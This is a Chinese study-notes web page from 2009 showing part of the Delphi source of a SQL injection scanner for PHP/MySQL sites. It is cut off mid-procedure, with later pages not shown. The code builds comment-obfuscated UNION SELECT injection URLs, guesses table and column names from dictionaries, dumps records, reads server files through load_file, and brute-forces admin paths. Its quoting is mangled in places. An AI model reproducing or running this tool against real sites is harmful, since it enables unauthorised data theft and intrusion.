PHP+MYSQL网站注入扫描_MySql_学习笔记★闵涛★计算机学习电脑编程软硬件技巧


	转至繁体中文版	\| 网站首页 \| 图文教程 \| 资源下载 \| 站长博客 \| 图片素材 \| 武汉seo \| 武汉网站优化 \|

PHP+MYSQL网站注入扫描

作者：闵涛文章来源：闵涛的学习笔记点击数：6080 更新时间：2009/4/22 20:48:41

procedure TForm1.sbstop1Click(Sender: TObject);
begin
stoped :=True;
pg1.Visible :=False;
end;

//不使用线程
procedure TForm1.InjTable;
var
i,j:integer;
begin
if (iStr='''''''') or (KeyWord='''''''') then exit;
lsbDict.Items.Clear;
lvTable.Items.Clear;
lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Table.txt'''');
j:=0;
isFinish :=False;
Screen.Cursor :=crHourGlass;
try
for i:=0 to lsbDict.Count-1 do
begin
if isFinish then break;
InjUrl:=Url+''''/**/and/**/1=1/**/union/**/select/**/''''+iStr+
''''/**/from/**/''''+lsbDict.Items+''''/*'''';

MM.Lines.Add(InjUrl);
if Get(InjUrl,KeyWord) then
begin
inc(j);
with lvTable.Items.Add do
begin
Caption :=IntToStr(j);
SubItems.Add(lsbDict.Items);
end;
end;
end;
finally
Screen.Cursor :=crDefault;
end;
end;

procedure TForm1.sbscan1Click(Sender: TObject);
var
i:integer;
begin
if (strtoint(EdtFieldNum.Text)<=0) or (KeyWord='''''''') then exit;
lsbDict.Items.Clear;
lvTable.Items.Clear;
N :=0;
lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Table.txt'''');
isFinish :=False;
for i:=1 to strtoint(EdtFieldNum.Text) do
iStr:=iStr+'''',''''+IntToStr(i);
iStr :=copy(iStr,2,length(iStr)-1);
//在一个线程内完成表段猜解工作
scanTable :=scanTableThread.Create(Url,iStr,KeyWord,MM,lvTable);
end;

procedure TForm1.sbscan2Click(Sender: TObject);
var
i,j,Sum:integer;
tablename:string;
begin
if lvTable.Items.Count<=0 then exit;
if lvTable.SelCount<=0 then
begin
MsgBox(''''请选择一个表名！'''');
exit;
end;
tablename :=trim(lvTable.Selected.SubItems.GetText);
if tablename='''''''' then exit;

if isFinish=False then
begin
lsbDict.Items.Clear;
lvField.Items.Clear;
MM.Clear;
N :=0;
lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Field.txt'''');
Sum :=lsbDict.Count;
iStr :='''''''';
pg1.Min :=0;
pg1.Max :=sum;
pg1.Step :=1;
pg1.Position :=0;
pg1.Visible :=true;
MM.Lines.Add(''''开始猜解字段。。。'''');
MM.Lines.Add('''''''');
for i:=1 to strtoint(EdtFieldNum.Text) do
begin
if i=strtoint(spNum.Text) then
iStr :=iStr+'''',&FIELDNAME&''''
else iStr :=iStr+'''',''''+inttostr(i);
end;
if iStr<>'''''''' then
iStr :=copy(iStr,2,length(iStr)-1);

SetLength(scanField,Sum); // 动态设置线程的数量
//创建多个线程完成字段猜解
for j:=0 to Sum-1 do
begin
//if isFinish then exit;
scanField[j] := scanFieldThread.Create(Url,iStr,KeyWord,tablename,j,MM,lvField);
scanField[j].OnTerminate := FieldThreadExit;
end;
// sbscan2.Caption :=''''停止'''';
end;

try
if isFinish=true then
begin
//if N>=lsbDict.Count then exit;
if sbscan2.Caption=''''停止'''' then
begin
for j:=N to lsbDict.Count-1 do
begin
if scanField[j].FreeOnTerminate then
begin
scanField[j].Suspend;
scanField[j].Free;
//scanField[j].Terminate;
end;
end;
end;
MM.Lines.Add('''''''');
MM.Lines.Add(''''字段猜解结束。。。'''');
// sbscan2.Caption :=''''猜解'''';
end;
except
end;

isFinish :=true;
end;

procedure TForm1.FieldThreadExit(sender: TObject);
begin
inc(N);
pg1.StepIt;
if N = lsbDict.Count then
begin
isFinish :=false;
MM.Lines.Add('''''''');
MM.Lines.Add(''''字段猜解结束。。。'''');
pg1.Visible :=False;
sbscan2.Caption :=''''猜解'''';
exit;
end;
end;

procedure TForm1.lvFieldClick(Sender: TObject);
begin
if lvField.Selected.Caption=''''1'''' then
begin
EdtField1.Text :=lvField.Items[0].SubItems.GetText;
spField1.Text :=lvField.Items[0].Caption;
end else
begin
EdtField2.Text :=lvField.Selected.SubItems.GetText;
spField2.Text :=lvField.Selected.Caption;
end;
end;

procedure TForm1.lvTableClick(Sender: TObject);
begin
EdtTable.Text :=lvTable.Selected.SubItems.GetText;
end;

procedure TForm1.sbrecordClick(Sender: TObject);
var i:integer;
begin
iStr :='''''''';
for i:=1 to strtoint(EdtFieldNum.Text) do
begin
if i=strtoint(spField1.Text) then
iStr :=iStr+'''',''''+trim(EdtField1.Text)
else if i=strtoint(spField2.Text) then
iStr :=iStr+'''',''''+trim(EdtField2.Text)
else iStr :=iStr+'''',''''+inttostr(i);
end;
if iStr<>'''''''' then
iStr :=copy(iStr,2,length(iStr)-1);

InjUrl :=Url+''''/**/and/**/1=2/**/union/**/select/**/''''+iStr
+''''/**/from/**/''''+trim(EdtTable.Text)+''''/**/where/**/''''+trim(EdtID.Text)+''''/*'''';

MM.Lines.Add(InjUrl);
if Get(InjUrl,'''''''') then
begin
wb.Navigate(InjUrl);
pcPHPInj.ActivePageIndex :=3;
end;
end;

procedure TForm1.sbfileClick(Sender: TObject);
var i,j:integer;
str,fname:string;
begin
if EdtFileName.Text='''''''' then
begin
MsgBox(''''请输入要猜解的文件名！'''');
exit;
end;
fname :=trim(EdtFileName.Text);
iStr :='''''''';
for i:=1 to length(fname) do
begin
iStr :=iStr+'''',''''+ IntToStr(Ord(fname));
end;
if iStr<>'''''''' then
begin
iStr :=copy(iStr,2,length(iStr)-1);
iStr :=''''load_file(char(''''+iStr+''''))'''';
end;

str :='''''''';
for j:=1 to strtoint(EdtFieldNum.Text) do
begin
if j=strtoint(spNum.Text) then
str :=str+'''',''''+iStr
else str :=str+'''',''''+inttostr(j);
end;
if str<>'''''''' then
str :=copy(str,2,length(str)-1);

InjUrl :=Url+''''/**/and/**/1=2/**/union/**/select/**/''''+str+''''/*'''';
MM.Lines.Add(InjUrl);
if Get(InjUrl,'''''''') then
begin
wb.Navigate(InjUrl);
pcPHPInj.ActivePageIndex :=3;
end;
end;

procedure TForm1.sbstop2Click(Sender: TObject);
var i:integer;
begin
isFinish :=true;
{ if N>=lsbDict.Count then exit;
for i:=N to lsbDict.Count-1 do
begin
if scanField.FreeOnTerminate then
begin
scanField.Suspend;
scanField.Free;
end;
end;
MM.Lines.Add('''''''');
MM.Lines.Add(''''字段猜解结束。。。''''); }
end;

procedure TForm1.sbscan3Click(Sender: TObject);
var
i,iPos,Sum:integer;
begin
if isFinish=false then
begin
Url :=trim(EdtInjUrl.Text);
if pos(''''http://'''',Url)>0 then
begin
Url :=copy(Url,8,length(Url)-7);
iPos :=pos(''''/'''',Url)
end else
iPos :=pos(''''/'''',Url);
Url :=''''http://''''+copy(Url,1,iPos-1);
if Url='''''''' then exit;

lsbDict.Items.Clear;
ListBox1.Items.Clear;
MM.Lines.Clear;
M :=0;
lsbDict.Items.LoadFromFile(ExtractFilePath(Application.ExeName)+''''Dict_Manager.txt'''');
Sum :=lsbDict.Count;
pg1.Min :=0;
pg1.Max :=sum;
pg1.Step :=1;
pg1.Position :=0;
pg1.Visible :=true;
MM.Lines.Add(''''开始猜解后台路径。。。'''');
MM.Lines.Add('''''''');
SetLength(scanManager,Sum); // 动态设置线程的数量
////开始扫描后台路径
for i:=0 to Sum-1 do
begin
scanManager := scanManagerThread.Create(Url,i,ListBox1,MM);
scanManager.OnTerminate := ManagerThreadExit;
end;
end;

if isFinish=true then
begin
try
for i:=M to lsbDict.Count-1 do
begin
if scanManager.FreeOnTerminate then
begin
scanManager.Suspend;
scanManager.Free;
end;
end;
MM.Lines.Add('''''''');
MM.Lines.Add(''''后台路径猜解结束。。。'''');
except
end;
end;
isFinish :=true;
end;

procedure TForm1.ManagerThreadExit(sender: TObject);
begin
inc(M);
pg1.StepIt;
if M = lsbDict.Count then
begin
isFinish :=true;
MM.Lines.Add('''''''');
MM.Lines.Add(''''后台路径猜解结束。。。'''');
pg1.Visible :=False;
exit;
end;
end;

procedure TForm1.sbstop3Click(Sender: TObject);
var i:integer;
begin
isFinish :=false;
{ if M>=lsbDict.Count then exit;
上一页   [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >>

[MySql]PHP存取 Mysql 数据乱码终极解决方案  [MySql]解决Table xxx is marked as crashed and should …
[MySql][MySQL]快速解决"is marked as crashed and shoul…  [MySql]MySQL DELETE语法用法详解
[MySql]mysql中时间日期格式化  [MySql]修改mysql导入文件大小限制
[其他]MySql常用命令大全  [Web开发]把ACCESS的数据导入到Mysql中的方法详解
[MySql]解决mysql 1040错误Too many connections的方法  [系统软件]利用crontab系统每天定时备份MySQL数据库

教程录入：mintao 责任编辑：mintao

上一篇教程： jsp+tomcat+mysql&sevlet&javabean配置全过程

下一篇教程： Installing MySQL on Solaris

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

注：本站部分文章源于互联网，版权归原作者所有！如有侵权，请原作者与本站联系，本站将立即删除！本站文章除特别注明外均可转载，但需注明出处！ [MinTao学以致用网]

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

同类栏目

· Sql Server  · MySql
· Access  · ORACLE
· SyBase  · 其他

热门推荐

没有教程

赞助链接

闵涛博文

500 - 内部服务器错误。

您查找的资源存在问题，因而无法显示。

鄂公网安备 42011102001154号

站长：MinTao ICP备案号：鄂ICP备11006601号-18

闵涛站盟:医药大全-武穴网。A打造B、C、D……